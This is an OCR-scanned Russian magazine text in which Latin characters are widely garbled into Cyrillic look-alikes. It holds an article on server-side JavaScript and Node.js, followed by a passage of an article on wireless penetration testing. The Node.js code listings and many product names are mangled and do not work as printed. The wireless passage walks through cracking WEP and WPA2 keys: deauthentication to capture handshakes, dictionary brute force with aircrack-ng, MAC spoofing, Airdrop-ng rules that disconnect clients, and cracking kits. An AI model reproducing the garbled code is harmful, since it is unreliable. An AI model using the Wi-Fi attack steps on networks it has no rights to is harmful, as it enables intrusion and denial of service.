подавляющее большинство других языков, на которых строят сайты) 
даже в нашем, черт подери, двадцать первом веке, работают по 
классической схеме «запрос-ответ». Запрос страницы заставляет 
веб-сервер поднять указанный скрипт, выполнить его (линейно, 
строка за строкой весь твой код), а результат возвратить браузеру 
клиента. После этого скрипт «умирает», а следующий же запрос 
запустит всю эту адскую машинку заново. А если таких запросов 
одновременно тысяча? Старый добрый подход называется С6І 
(интерфейс взаимодействия веб-сервера и интерпретатора языка, 
на котором написана страница). Хитрые надстройки вроде РазЮбІ 
расширяют протокол, позволяя избежать выгрузки скрипта после 
первого запроса. Таким образом, когда второй пользователь запро- 
сит ту же страницу, для него будет уже все готово, останется только 
выполнить скрипт с новыми параметрами. Но все эти ухищрения — 
все равно не то. 

что ТАКОЕ ХОРОШО, А ЧТО ТАКОЕ ПЛОХО 

Многие разработчики всегда считали ^аѵа5сгір1; просто «при- 
мочкой» к браузеру, эдаким недоязыком, который годится разве 
что для управления формами и манипулирования ООМ-деревом 



веб-страницы. Некоторые до сих пор думают, что «)аѵа» в названии 
что-то да значит! :) Действительно, язык очень простой. Впрочем, 
настоящие программисты давно научились творить с его помощью 
чудеса, предоставив нам потрясающе удобные онлайн-сервисы, 
которыми мы ежедневно пользуемся. Многие из таких профи 
пошли дальше и, трезво посмотрев на сам язык и его возможно- 
сти, особенно по части работы с событиями, решили: а что если на 
^аѵа5сгір1: написать сервер? Ты получаешь возможность написать 
на одном и том же языке все части сайта: что серверную часть, что 
саму клиентскую страничку. Кроме того, отлично, просто идеаль- 
но подходит для разных веб-штучек. Он очень простой и одновре- 
менно гибкий, что позволяет писать код в разных парадигмах: от 
обычного процедурного до ООП в смеси с функциональным стилем. 
А главное — это тотальная асинхронность. Это значит, что твой 
код будет выполняться не последовательно, как в случае с РНР/ 
Регі-скриптами, а именно в тот момент, когда для него будут готовы 
все данные. Ведь для веба не надо большой вычислительной мощ- 
ности — большую часть времени сервер ожидает событий вроде 
получения данных формы, выборки из базы данных или, что еще 
хуже, ответа на запрос к другому серверу. Обычный РНР-скрипт 
в такое время простаивает, а значит, простаивает весь поток, не 
позволяя серверу задействовать его для других пользователей. В 
такой ситуации не спасает даже Мдіпх. В случае с ^аѵа5сгір1: ты 
просто указываешь, какую функцию необходимо выполнить, когда 
произойдет определенное событие, и все. В это время другой код 
может спокойно выполняться. Такая функция называется саКбаск, 
или обработчик событий. Хотя писать действительно сложный код в 
таком стиле немного неудобно, особенно если твоя функция зави- 
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Ыо(1е.]5 — веб-сервер с Ѵ8 внутри 



СИТ от нескольких событий сразу, но и для этого уже придумали 
свои фреймворки, зачастую гораздо более мощные и элегантные, 
чем все эти РНР/КиЬу/РуІбоп. 

А К ЧЕМУ ОНА ВООБЩЕ, ЭТА АСИНХРОННОСТЬ? 

Для примера ограничений последовательного выполнения кода 
рассмотрим два типовых примера кода на РНР и ^аѵа5сгір1:, 
выполняющих одно и то же. Начнем с любимого РНР: 

$гезиІС = $(іЬ->РеСс]тОпе ( ' ЗЕЬЕСТ изег_пате ЕЕОМ изег_ 

ассоипСз ШЕЕЕ ісі = 1 ' ) ; 

есііо 'Мое имя: ' . $гезиІС . ' ; ' ; 

В первой строке мы посылаем простой 501-запрос к БД на выбор- 
ку имени пользователя, у которого ісі = 1. Обрати внимание: в 
этом месте скрипт останавливается, и следующая строка не будет 
выполнена до того самого момента, пока запрос не будет обрабо- 
тан базой, а результат не возвратится в переменную фгезиІН Да, 
в нашем примере это тысячные доли секунды, но в реальности и 
запросы гораздо сложнее, и базы по размеру зачастую составляют 
гигабайты, и запросов таких может одновременно быть пара тысяч. 
А теперь попробуем написать код на ^5, используя асинхронный 

СТИЛЬ: 

(ІЬ . диегу ( ' ЗЕЕЕСТ изег_пате ЕЕОМ изег_ассоипСз ШЕЕЕ 
ісі = 1', іипсСіоп (егг , гез){ 

іі (!егг) зуз.1од('Мое имя: ' + гез); 

}) ; 

зуз . Іод ( ' Продолжаем выполнение ' ) ; 



ГОТОВЫЕ НАРАБОТКИ 
ДЛЯ СЕРВЕРНОГО ^АVА8СРIРТ 



Конечно, ты можешь писать код с чистого листа, что и делают 
многие правильные программисты. Однако немало из таких 
правильных программистов создали для себя удобные каркасы 
и наметки, которые теперь постоянно используют и предлагают 
всем желающим в виде фреймворков и спецификаций. Если 
ты всерьез решил использовать серверный І5, то это отличный 
способ облегчить себе жизнь. 

МагѵѵЬаІ [ пагѵѵбаііз.ога ] — мощное решение, работающее поверх 
многих І5-ДВИЖКОВ. Таким образом, программистам не надо 
париться по поводу различия различных серверов — они могут 
просто писать код. 

Соттоп^5 [ сотппоп]5.огд ) — попытка стандартизировать плат- 
форму и дать общий АРІ для всех движков, предлагая низкоу- 
ровневый АРІ, а также АРІ для подключения различных готовых 
модулей. 

^56I (іаѵаЗсгірІ: даіе іпіегіасе) — разработан специальный про- 
токол взаимодействия связи веб-демона и серверных сцена- 
риев на іаѵаЗсгірЕ Увы, спецификацию пока полностью поддер- 
живает только проект РЫпо в окружении сервера ]еиу. 




нетѵег 
Ш пд[г>х 

№іп 

■ Іотаііо 

■ ПОСІѲ 



50 1Ш 150 200 250 300 

сопси ггепсу 



Производительность Ыос1е.]5 



Тут опять же создается запрос к базе данных, однако кроме самого 
501-выражения в запросе передается еще и функция-обработчик 
(саКбаск). Эта функция будет вызвана именно тогда, когда придет 
ответ от базы данных, а до этого момента выполнение скрипта ни в 
коем случае не будет стопориться. Для примера в следующей стро- 
ке мы просто выводим строку в консоль, чтобы показать, что выпол- 
нение сценария продолжается сразу после формирования запроса, 
не ожидая его завершения. Собственно, в основе любого варианта 
серверного Іаѵа5сгір1; заложена концепция событий и саЕЬаск'ов, 
то есть обработчиков событий. Ты можешь описывать собственные 
события. Тогда ход выполнения приложения будет зависеть от 
событий, которые возникают в результате активности пользователя 
на странице («форма заполнена» или «новое сообщение» и т.д.) 
или генерируются внутри самого сервера (как, например, в случае 
с обращением к базе данных). Те действия, которые необходимо 
выполнять в случае наступления событий, описываются внутри 
функций обработчиков событий. 

движок, вот в ЧЕМ ВОПРОС 

Короче говоря, использовать Іаѵа5сгір1; не только для клиентской 
части, но и на серверной стороне — это хорошо и даже приятно. 
Другой вопрос — каким образом это возможно осуществить? Сегодня 
есть четыре основных движка, которые используются на серверах. 
РЬіпо — движок от компании МогІКа, написанный на іаѵа и под- 
держивающий последнюю 1.7 версию стандарта І5, который к тому 
же дополняет язык собственными расширениями и объектами. 
Основным преимуществом движка является работа поверх стан- 
дартной ІѴМ, а значит, его можно использовать в любой среде, где 
работает іаѵа. Другими словами, можно применять современные 
веб-серверы типа )е1:1:у, но при этом писать на любимом І5. Кстати, 
ЕЫпо применяют на облачном хостинге от Ооодіе! А вот с произво- 
дительностью сложнее. Она зависит, с одной стороны, отдвижка и 
применяемых там технологий, вроде ЛТ-компиляции, и от работы 
самой іаѵа-машины. Кстати, многие тестеры, которые говорят, что 
ЕЫпо очень медленный, забывают, что движок имеет два режима 
работы: интерпретации, когда скрипт каждый раз преобразуется в 
іаѵа байт-код (аналогично РНР), и компиляции, когда такое преоб- 
разование происходит только раз, а потом многократно исполня- 
ется. Первый режим выгоден, когда ты отлаживаешь код, который 
меняется каждую минуту, второй больше подходит для рабочей вер- 
сии проекта, работающей под нагрузкой. 

ЗрісІегМопкеу — еще один движок от МогЛа, на этот раз на С. 
Кстати, это вообще первый в мире движок І5, написанный еще в 
Меізсаре — сегодня он открыт и используется в таких популярных 
продуктах как Рігеіох, АбоЬе АсгоЬаІ; и даже в одном из эмуляторов 
серверов онлайн-игры ІІШта Опбпе. Далее разработчики сильно 
модифицировали его, добавив компиляцию І5 напрямую в ассем- 
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■ ^ИппТпЛ и{и№Е«тКЕЕЦ 
Грйё Ёій ^скеййп Ряій Ѵіпѵ ТопЬ Ри]«1 Рг^нгепек 



йК* 



: ѵаг дуя гефзі ге [ ' 3 уд ' ^ 

2 ЬЫр гефзі ге- ( ' ЬіИр ‘ ; 

•і цірі:р,с!геат;с5чтѵсг [іГипсі;ІРп С«^Ч.г геэЗ Е 

5 гсЭпѴгіъс}ісасІ{20Сх 4 'Сопсспс-Іурс ' ; 'ъскс/ріаіп' }> : 

6 геа.ешЦ'НеІІо Ког1й\,в"3; 

Т дуд.рисд ( ' Іпсашдпд' сазлесЬз.азі\п‘ ) ; 

9 ]]. -ііасеп (враг, "іг7.а.о.і"1 ; 

9 

10 аул. росе [' Эегѵес Ешшіпд ас Псср: //1?7 .0.0. Б002/ ' } : 



Пример асинхронного веб-сервера 



блерный код, и переименовали в ТгасеМопкеу — именно этот дви- 
жок используется в ветке 3.6 РігеЬх’а. В основном ЗрібегМопкеу 
используют в ПО, которое написано на С/С++ и нуждается в скрип- 
товом языке. Из известных продуктов: Соппеі-сервер АРЕ, по50Е БД 
СоисЬОВ, серверная платформа Захег и модуль к АрасЬе тоб_]5. 
РиіЬагк — это движок от Орега, который, кроме браузера, исполь- 
зуется в их инновационном сервисе Опі1;е (типа встроенный сер- 
вер в каждом браузере), а также на их серверах, обслуживающих 
мобильный браузер Орега Міпі. Жаль, что движок закрыт, и его 
пока нигде за пределами самой Орега не применяют. 

Ѵ8 — движок от Ооодіе, который используется в ОЬготе и является 
основой будущей ОЬготе 05. Оегодня это самый крутой, быстрый 
и мощный движок, в котором 35-КОД напрямую преобразуется в 
ассемблер целевого процессора, что позволяет обойти по скорости 
все остальные движки. Кроме этого гугловцы используют множество 
ухищрений для оптимизации, хранят в памяти скомпилированный 
код, оптимизируют его на лету (например, удаляют блоки кода, кото- 
рые по решению компилятора вообще не могут быть задействованы, 
и Т.П.). На базе этого движка построена самая популярная и быстро- 
развивающаяся серверная платформа — Мобе.35. 

N0^Е.^З 

Вероятно, именно после выхода СЬготе разработчики смекнули, 
что такой быстрый движок можно успешно использовать и на сер- 
вере. Первым опытом стал проект Ѵ8сді, который просто позволял 
писать серверные сценарии, работающие с любым веб-сервером 
по стандартному протоколу С6І. Дальнейшие эксперименты при- 
вели к рождению проекта Мосіе.із — полностью самостоятельной 
платформы, включающей, кроме движка, встроенный сервер (НТТР 
и ТСР/ІЗОР/ІЗпіх-5оке1:) и базовый набор библиотек, а также предо- 
ставляющей полностью асинхронную работу с файлами и сетевыми 
устройствами. 

Проект развивается настолько быстро и активно, что уже сейчас 
готов к промышленному использованию. Это, в частности, дока- 
зывает опыт парней из Ріигк (азиатский аналог твиттера), которые 
полностью перенесли свой сотеі-сервер, изначально написанный 
на Заѵа и солидном ЗВозз Меиу, на Мобе.)5 и, по отзывам, сократи- 
ли потребление памяти буквально на гигабайты. А масштабы у них 
еще те — более сотни тысяч одновременных соединений. 

Запустить НТТР-сервер, способный обрабатывать асинхронно 
тысячи подключений — это несколько строк кода: 

ѵаг зуз = ^е^иі^е ( ' зуз ' ) , 

ІЩЦр = гедиіге('1іЦ1:р'); 

ІЩрр . сгеаСеЗегѵег ( РипсСіоп (гер, гез) { 

гез .ѵ^гіРеНеасі (2 00 , { ' СопРепР-Туре ' : ' РехР/рІаіп ' } ) ; 

гез . еп(і ( ' Неііо Шог1сі\п ' ) ; 

}) .1ізРеп(80, "127.0.0.1") ; 

зуз . риРз ( ' Зегѵег гиппіпд аР ІіРРр : / /127 . О . О . 1 : 80 / ' ) ; 

Чтобы запустить сервер, скопируй код в файл ехатр[е.)5 и укажи 
его при запуске демона побе: 
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Для последних версий Ыос1е.]5 есть полноценный 
ѴѴіпгіоѵѵ5-порт 



% посіе ехатріе.з'з 

Зегѵег гиппіпд аР 1іРРр://127. 0.0. 1:80/ 

Маленький тест провести очень просто. Можно взять программу 
АрасЬе ВепсЬ — очень простую тулзу для проведения нагрузоч- 
ного тестирования, и запустить ее: гиппіпд «аЬ -п 1000 -с 100 
‘Ы:1:р://1 27.0.0.1 :80/’». Таким образом, бенчмарк будет «обстрели- 
вать» сервер тысячами запросов, используя 100 одновременных 
подключений. На моем ноутбуке сервер выдержал больше 3000 
запросов в секунду. Это очень много! 

Сам сервер написан на С++ и совсем немножко на ассемблере, 
однако большая часть библиотек из дистрибутива разработана 
на ОаѵаЭсгірЕ В состав базового набора сервера входят только 
основные функции, остальное оставлено на плечах разработчиков, 
которые уже написали сотни разных библиотек и фреймворков. 
Впрочем, молодость проекта дает о себе знать: многих привычных 
для других решений модулей еще нет, а у многих библиотек теку- 
щая версия — 0.0.1, что не придает уверенности в их стабильности. 
Некоторые тривиальные задачи могут вообще не иметь готового к 
закачке решения, но бывает и наоборот — количество реализаций, 
зачастую радикально разных по архитектуре, исчисляется десятка- 
ми (доступ к базе Му50Е, например). Хотя большинство библиотек 
написано на чистом ЗаѵаЭсгірІ:, есть и такие, что требуют компи- 
ляции модуля к серверу, что обещает гораздо большую скорость — 
они просто расширяют стандартный АРІ сервера. 

ОСОБЕННОСТИ N0^Е.^З 

Основной особенностью Мобе, кроме полной асинхронности, 
является его однопоточная модель. Другими словами, все опера- 
ции выполняются в одном и том же потоке ОС, даже если у твоего 
сервера тысяча одновременных пользователей. Правда, доступ- 
но создание дочерних процессов и низкоуровневое управление 
исполнением скриптов (загрузка, компиляция, работа с ассем- 
блерным кодом, исполнение). Для реализации многопоточности и 
задействования всех ядер современных процессоров рекомендует- 
ся просто загружать несколько копий приложения, но можно взять 
на вооружение ѴѴеЬѴѴогкег из стандарта НТМЕ5 и распределить 
работу приложения по нескольким дочерним процессам. Не думай, 
что раз нет многопоточности — это тормоз и отстой. Вспомни, что 
веб-приложение делает полезную работу очень быстро, а боль- 
шую часть времени просто ожидает чего-то (данных от базы, от 
тетсасЬеб'а или новомодной Мо50Е-базы), либо просто держит в 
памяти открытые соединения для СотеПа, поэтому в одном потоке 
можно обработать и десяток тысяч, не прибегая к кластеризации. 
Второй особенностью архитектуры Мобе является событийность. 
Почти каждая операция имеет коллбэки, генерирует событие, а 
пользователю доступен объект ЕѵепіЕтбег, через который можно 
буквально одной строкой генерировать свои события (это неслож- 
но, ведь событие — это просто строка с названием, а также спи- 
сок параметров, которые передаются в обработчик). Сам по себе 
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Утилита для мониторинга логов 



Мосіе построен вокруг ЕѵепНоор — глобального цикла 
обработки событий, который на каждом тике проверяет, 
готовы ли данные для какого-либо из определенных 
пользователем коллбэков. Если данные есть, начинает- 
ся выполнение кода. Если не осталось больше кода — 
ожидаем следующего вызова. Цикл выполняется вне ^5, 
а в самом движке, написанном на С, вследствие чего 
это происходит очень и очень быстро (порядка сотен 
тысяч раз в секунду). Что-то типа бесконечного цикла. В 
дополнение к этому в сервер встроен очень эффектив- 
ный сборщик мусора (ОС), поэтому даже тысячи подклю- 
чений не вызывают переполнения памяти и падения 
сервера. Мос1е.)5 обладает встроенной родной системой 
работы с событиями. 

ПРОСТЕЙШИЙ ЗТЕАМІМ6-СЕРВЕР 

Попробуем написать простой, но в тоже время полезный 
пример, который в реальном времени будет выдавать 
пользователю полезную информацию без перезагрузки 
страницы. Вот идея для нашего приложения — брать 
новые данные, которые добавляются в текстовый лог, и 
выводить их в реальном времени на веб-странице: 

ѵаг зуз = гедиіге ( ' зуз ' ) , 
пеС = гедиіге ( ' пеС ' ) , 

зраѵлт = гедиіге ( ' сМ1сі_ргосезз ' ) . зраѵ^п, 
ІЩрр = гериіге("]ти:р"); 
зуз . риСз ( ' \пМу ргосезз РІВ: ' + 

ргосезз.рісі + '\п'); 
ѵаг Раіі = зраѵ^п ( ' Раіі ' , ['-П', 

' /ѵаг/іод/пдіпх/ассезз . Іод ' ] ) ; 

// указываем названия логфайла 
зуз .риСз ( "ЗСагР Раіііпд"); 

Раіі . зСсіоиР . асісіЬізРепег ( "сіаРа" , 

РипсРіоп (йаРа) { 
зуз . риРз (йаРа) ; 

/ /дублируем себе на консоль 

}) ; 

йРРр . сгеаРеЗегѵег ( РипсРіоп ( гед, гез ) { 

гез . зепбНеабег (200 , { "СопРепР-Туре" : 



о л о г о- 




Проект молодойр и АРІ постоянно изменя 
ется 



" РехР/рІаіп" } ) ; 

Раіі . зРбоиР . аббЬізРепег ( "баРа" , РипсРіоп 
(баРа) { гез . ѵ^гіРе (баРа) ; }); 

} ) . ІізРеп ( 80 ) ; 

С помощью функции зраѵѵпО мы создаем дочерний про- 
цесс утилиты Іаіі, которая, собственно, и занимается 
тем, что считывает новые данные, которые появляются 
в логфайле. Процесс запускается только раз во время 
старта сервера. Собственно, наша задача — отлавливать 
моменты, когда команда Іаіі будет выводить новые данные 
из логфайла и транслировать вывод на веб-страницу каж- 
дому подключившемуся клиенту. Для этого мы будем сле- 
дить за возникновением события даіа (появлением новых 
данных) для переменной, к которой запущен процесс 
утилиты Іаіі, и выводить их на страницу с помощью коман- 
ды ѵѵгіІеО. Таким образом, соединение будет оставаться 
открытым для каждого НТТР-запроса. Вот и все. Следить 
за активностью процесса не так просто для обычного 
веб-приложения, но ничего не стоит для неблокируемой 
архитектуры побе.)з и логики выполнения, основанной на 
событиях. Нам остается только запустить скрипт: «побе 
1:аі[.)5 еггог.іод» и открыть в браузере Ы:1;р://[оса[Ьо5Е80. 

На странице будут отображаться все сообщения, которые 
появляются в логфайле еггог.Ьд. 

вот и СКАЗОЧКЕ КОНЕЦ 

Сейчас, выбирая на чем бы таком написать очередное 
\л/еЬ 2.0 приложение, где не только красивый клиент- 
ский код, но и что-то надо делать на сервере, тебя 
парит одна грустная мысль о том, что все уже изобре- 
ли и написали до тебя. Те же языки, что и десять лет 
назад, те же библиотеки, протоколы и сервера. РНР 
уже ого сколько лет, Регітак вообще седой, РуТбоп у 
всех на слуху, а РиЬу успел надоесть. Писать для веба 
стало рутиной — посмотри, как твои друзья сидят и 
думают, что же сделать с 25-мегабайтным монстром 
2епб-Ігатеѵѵогк. А тебе хочется что-то нового, быть 
на острие прогресса, создавать то, на чем потом будут 
писать все, а сейчас знают только увлеченные хаке- 
ры и ищущие себя дзен-программеры? Посмотри на 
баѵаЗсгірІ: в сервере, он просто создан для этого. Очень 
простой, мощный, еще не погрязший в тонне библиотек 
и фреймворков. Задачи, которые на РНР не решить 
вообще, на базе Мобе.бЗ решаются буквально десятком 
строк. И, возможно, именно такое программирование, 
наконец, принесет утраченное чувство наслаждения от 
разработки ! -и- 




> ІП^О 

Большинство, если 
не все, библиотеки 
и проекты на Мобе. 

65 сосредоточены на 
ОіІбиЬ, поэтому если 
н ет ка ко го -то м одул я , 
нужного тебе, ищи 
его там. 




НТТР://ѴѴѴѴѴѴ 

"і Г 

> Ііпк5 

• Материалы по 
МобебЗ: 

дгоирз.доодіе.сопп/ 

дгоир/побе]5 

• Русскоязычный 
сайт и форум: 
1огит.побе)5.ги 

• Информация о сер- 
верном 65: 
еп.ѵѵікіребіа.огд/ 
ѵѵікі/5егѵег-5Ібе 
6аѵа5сгірІ: 

• Хороший мануал 
для начинающих по 
Мобе.65: 
ѵууѵѵу.зІібезЬаге. 
пеіАбе ипбейпеб/ 
побе)з-а-диіск-І:оиг 

• Презентация- 
введение по Мобе. 
65: 

побе]5.огд/]5СОпЕрб1 
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Пентест беспроводных сетей: что нового? 

Еще не так давно для взлома ключа к беспроводной сети потребовалось бы сле- 
дующее: откомпилировать и установить под Ыпих необходимый софт, отыскать 
редкий беспроводной адаптер на строго определенном чипсете и еще, как мини- 
мум, пропатчить для него драйвера, чтобы можно было инжектировать пакеты 
в сеть. Так ли это сложно сейчас? 



БЕСПРОВОДНАЯ АЗБУКА 

Прежде чем начать, напомню несколько важных основ пентеста бес- 
проводных сетей, чтобы освежить их в памяти для тех, кто с этой 
темой уже знаком, и ввести в курс дела тех, кто раньше с этим вопро- 
сом не сталкивался. Последним повезло больше всех, потому как 
подобрать пароль для беспроводной сети, при условии, что он вообще 
подбираемый, сейчас стало как никогда просто. Все упирается только 
в то количество времени, которое потребуется на это потратить. 

Итак, беспроводные сети могут быть открытыми, к которым может 
подключиться любой желающий, и закрытыми, для подключения 
к которым необходимо ввести ключ. В закрытых беспроводных 
сетях по-прежнему, хотя и редко, используется защита ѴѴЕР (ѴѴігесІ 
Ериіѵаіепі: Ргіѵасу), которая безнадежно устарела, и, в большинстве 
случаев, технология ѴѴРА/ѴѴРА2 (ѴѴі-Еі Ргоіесіесі Ассезз). Применение 
ѴѴЕР — это своего рода приговор, потому что такая защита со 100% 
вероятностью взламывается из-за фундаментальных уязвимостей. 
Ключ к ѴѴРА/ѴѴРА2, напротив, возможно подобрать с помощью брут- 
форса, причем успех напрямую зависит от того, есть ли используемый 
ключ в словаре для подбора или нет. Несмотря на концептуально 
разные подходы к взлому этих защит есть одно общее звено — для 
проведения атаки необходимо перехватить беспроводной трафик в 
сети. С этой задачей справляются специально заточенные для работы 
с ѴѴі-Еі-снифферы, в том числе утилита аігосіиппр, которая является 
своего рода стандартом де-факто. Правда, просто запустить сниффер 
и сохранить в дамп зашифрованные данные из эфира недостаточно. 
Обязательным требованием является перехват пакетов, которыми 
клиент обменивается с точкой доступа в момент подключения. В 
случае с ѴѴЕР — это так называемые вектора инициализации IV, а в 
случае с ѴѴРА/ѴѴРА — последовательность «ѴѴРА Напсізбаке». Только 
эти и другие пакеты, отвечающие за аутентификацию и поддержание 



соединения, передаются в эфир в открытом виде без шифрования. 
Загвоздка заключается в том, что клиент авторизуется на точке досту- 
па довольно редко, и этого момента в общем случае пришлось бы 
ждать очень долго. Однако если отправить в сеть специально состав- 
ленный пакет деаунтетификации, то он с большой вероятностью 
отключит клиента от АР и вынудит его подключиться к ней вновь. Для 
этого есть специальные утилиты. Авторитетная аігеріау — одна из них. 
Тут надо сказать, что инжектировать фреймы возможно, если пере- 
вести беспроводной адаптер в так называемый режим мониторинга 
(топТог тосіе], а под виндой сделать это практически невозможно. 

По этой причине и сложилось, что стандартной платформой для игр 
с ѴѴІ-ЕІ являются *піх-системы. Проще всего эксперименты даются с 
помощью небезызвестного Васкігаск, в который изначально включе- 
но все необходимое. Причем для запуска потребуется лишь сделать 
из дистрибутива загрузочную флешку с помощью утилиты ІІМеіЬооІіп 
[ ипеіЬообп.зоигсеі'огде.пеі ]. Возвращаясь к теории: когда на руках 
есть дамп с перехваченными пакетами, в бой вступает утилита 
непосредственно для взлома ключа. Тут есть разные варианты, 
но среди прочих выделяется классическая тулза аігсгаск, которая 
использует несколько алгоритмов для взлома ѴѴЕР, а также метод 
брутфорса для ѴѴРА/ѴѴРА2. Если все проходит хорошо, на выхо- 
де программы пентестер получает ключ для беспроводной сети. 
Примечательно, что все три утилиты аігосіиппр, аігеріау и аігсгаск 
входят в один пакет утилит Аігсгаск-пд ( аігсгаск-па.ога ). 

ѴѴІ-П СРАСКЕР 

Из всего этого вырисовывается вполне понятная схема для взлома 
ключа к беспроводной сети (для определенности, пусть она будет 
защищена ѴѴРА2). Предварительно беспроводной адаптер пере- 
водится в режим мониторинга. После этого запускается аігосіиппр. 
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Простенький скрипт на РуПіоп избавляет 
от геморроя 



:ер К€^ѵ— 



НЕК КЕѴ ОЕСАѴРТЕС -> бБ23!33;7в:бб:50:4Г:24:2Э;б5с4С^4О;5Е 
АК« «ЕѴ ОЕСПУРТЕС -> п#Эр№<^«#с^«^ 



* АПй нііч^Е:»і ий^^I і-нй'ічХйн 

• РЕР1.АК1М6 АИР ИЕОУ65Т 



Новая версия ЗроопѴѴРА, которая вот-вот 
появится в Сети 



чтобы в целом изучить эфир и определить доступные сети. Далее в 
ход идет сниффер для перехвата данных беспроводных клиентов и 
строго определенной точки доступа (она указывается по МАС-адресу) 
на заданном канале, а в сеть с помощью аігеріау отправляется беиіб- 
пакет, чтобы отключить отточки доступа какого-нибудь пользователя 
(опять же, по МАС'у). Как только сниффер сообщаете перехвате 
последовательности ѴѴРА Напбзбаке, дамп сниффера скармливается 
крякеру аігсгаск, который в свою очередь пытается подобрать ключ по 
словарю. Все очень просто, но довольно муторно и не очень удобно. 
Все утилиты консольные, поэтому постоянно приходится ковыряться с 
передаваемыми ключами для запуска, копировать туда-сюда нужные 
МАС-адреса, названия дампов. Перед атакой еще неплохо изменить 
свой собственный МАО с помощью тулзы тассбапдег, а чтобы отсо- 
единить пользователя от точки доступа, тулзу аігеріау зачастую при- 
ходится запускать несколько раз. И если раньше приходилось делать 



КАКОЙ БЕСПРОВОДНОЙ АДАПТЕрЛІ’ІІИЛІіііііііИііііДУі! 



Перед тем, как экспериментировать, нужно убедиться, что бес- 
проводной адаптер может работать в режиме мониторинга. 
Лучший способ — свериться со списком поддерживаемого обо- 
рудования на сайте проекта Аігсгаск-пд ( ЬІІ ѵ/ѵѵіб абаріег Из! ). 
Если же встанет вопрос о том, какой беспроводный модуль 
купить, то начать можно с любого адаптера на чипсете 
ВТЕ8187Е. ПВВ’шные донглы легко найти в интернете за $20. 




Китайский кит для взлома ѴѴі-Рі 



все вручную, то сейчас процесс можно без труда автоматизировать с 
помощью готовых решений. 

1. АУТОМАТІС ѴѴРА НАМ05НАКЕ САРТУРЕ ( собе.аооаІе.сот/р/зѵІооЫ . 
Это очень простой, написанный на Руібоп'е скрипт, который ты легко 
мог бы набросать и сам. Все, что он делает — это последовательно 
выполняет те самые действия для получения ѴѴРА бапзбаке'а, которые 
я только что описал. Запускает одну программу с нужными параметра- 
ми, обрабатывает ее вывод, формирует ключи для запуска следующей 
утилиты и т.д. От пользователя требуется только указать название 
интерфейса (например, топО), канал, МАС-адреса точки доступа и 
клиента, а на выходе получить битр-трафика с Напбзбаке'ом. 

2. 5Р00МѴѴЕР/5Р00МѴѴРА ( Іогиплз.гетоІе-ехрІоіЕогд ). Эти две ути- 
литы впервые появились в ВаскІгаскЗ и тут же стали популярными. 

Что легко ПОНЯТЬ: с этого момента для подбора ключа к беспровод- 
ной сети вообще пропала необходимость ковыряться в консоли. По 
сути, все, что позволяют делать ЭроопѴѴер/ЭроопѴѴра — это удобно 
управлять тулзами из набора аігсгаск-пд с помощью графического 
интерфейса и выполнять часть действий автоматически. Но это ни в 
коем случае не отнимает необходимости понимать, что происходит во 
время атаки. Пользователю точно так же необходимо вручную указы- 
вать тот же самый канал, на котором работает точка доступа, правда, 
не в виде параметра для запуска приложения, а с помощью графиче- 
ского ползунка. 

3. 6ЕРІХѴѴІРІ СРАСКЕР ( Іогитз.гетоІе-ехрІоіЕогд ). Большое количе- 
ство недоработок, которые оказались в ЭроопѴѴер/ЭроопѴѴра, заста- 
вила составителей Васкігаск'а отказаться от них в четвертом релизе 
дистрибутива. Но свято место, как известно, пусто не бывает, и на 
замену пришла замечательная тулза Оегіх ѴѴіЕ сгаскег. Это не авто- 
матический взломщик сети, но очень профессиональный помощник, 
упрощающий многие моменты. Что нужно делать самому пользова- 
телю: на вкладке «Сопбдигабоп» вручную выбрать беспроводной 
интерфейс (не забыв перевести его в режим мониторинга с помощью 
специальной опции) и далее в списке, где приведен вывод сниффера, 
указать беспроводную сеть для взлома. После этого, в общем-то, оста- 
ется нажать кнопки «Эіагі: ЭпіІЕпд апб Еоддіпд» и «Регіогт а Іезі оі 
іщесбоп АР» на вкладках ѴѴЕР или ѴѴРА, в зависимости от используе- 
мой в сети защиты. Еще одна вкладка — Раке АР — позволяет мигом 
создать на нужном канале фейковую точку доступа — это фронтед для 
консольной утилиты аігЬазе-пд. 

ВЛАСТЕЛИН БЕСПРОВОДНЫХ УСТРОЙСТВ 

Важной составляющей любой атаки, как уже было сказано, является 
отключение беспроводного клиента отточки доступа, чтобы он заново 
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Подробные логи Аігсігор-пд 

было указать только первые три составляющие, которые, как известно, 
закрепляются за конкретными производителями. Более того, можно 
даже задать название вендора в строковом виде (б/ЫикзузІапу): про- 
грамма в этом случае сама заглянет в базу Сотрапу ОІЛ, где найдет 



^^Iсоте~| СопПэигаЦоп рііѵЕР | УУРд | Рак&ДР [ Сгаскгпд | ЕжТ:га^ | Сгегіііі | 



вегіхгг 



Ш >8В « 



бегіх \М\і\ сгаскег из стандартного набора 
Васкігаск 4 



А 



подконнектился и обменялся пакетами авторизации. Утилиты аігеріау- 
пд, тбкЗ, Ѵоібі 1 — все, по сути, предназначены для одного и того 
же — отправки в беспроводную сеть пакета деаутентификации, чтобы 
разорвать коннект между клиентом и АР. Они написаны несколько лет 
назад, и до сих пор активно используются. Концептуально новая раз- 
работка была представлена в начале года в Вашингтоне на конферен- 
ции ЗЬтоосоп — это тулза Аігбгор-пд. 

Что она позволяет сделать? Сказать по правде — почувствовать себя 
маленьким властелином. Дело тут не ограничивается только отключе- 
нием клиента отточки доступа. Нет. Вместо этого ты можешь полно- 
стью управлять подключениями пользователей, разрешая или полно- 
стью запрещая им подключения к точке доступа. Политика задается 
с помощью правил, вроде тех, которые используются в файерволе. 
Причем это могут быть очень гибкие правила, позволяющие реали- 
зовать все что угодно. Начиная оттого, что разом отключить всех 
пользователей от любых точек доступа (и препятствования их под- 
ключению вновь), и заканчивая сложными правилами, когда коннект 
разрешается только для строго определенной точки доступа, но и то 
только для конкретных клиентов (скажем, для ноутбуков компании 
□еШ. Это очень круто. 

Правила записываются в текстовом виде в специальный файл и счи- 
тываются программой последовательно от первого до последнего. 
Каждое правило состоит из трех полей: асбоп/ар/сбепк С помощью 
поля асбоп правила разделяются на разрешающие (а — абоѵѵ) и 
запрещающие (б — бепу). Параметры «ар» и «сИепІ:» указывают соот- 
ветственно на точку доступа и клиентов, к которым это правило при- 
меняется. Общий синтаксис такой: 



КОМПЛЕКТЫ ДЛЯ ВЗЛОМА 



ѴѴІ-РІ для ЛЕНИВЫХ 



Дистрибутив ВаскТгаск -это, по большому счету, готовый сбор- 
ник софта для тех, кто не хочет париться с поиском утилит для 
пентеста. Но если говорить о взломе ѴѴі-Рі, то сборники бывают 
не только программ, но и оборудования. 

1. В МедаМеѵѵз прошлого номера мы упоминали о готовых ком- 
плектах девайсов для взлома ѴѴі-Рі, которые активно продают- 
ся в Китае под лозунгом «Интернет должен быть бесплатен». 
Собственно, сам комплект состоит из дешевой узконаправлен- 
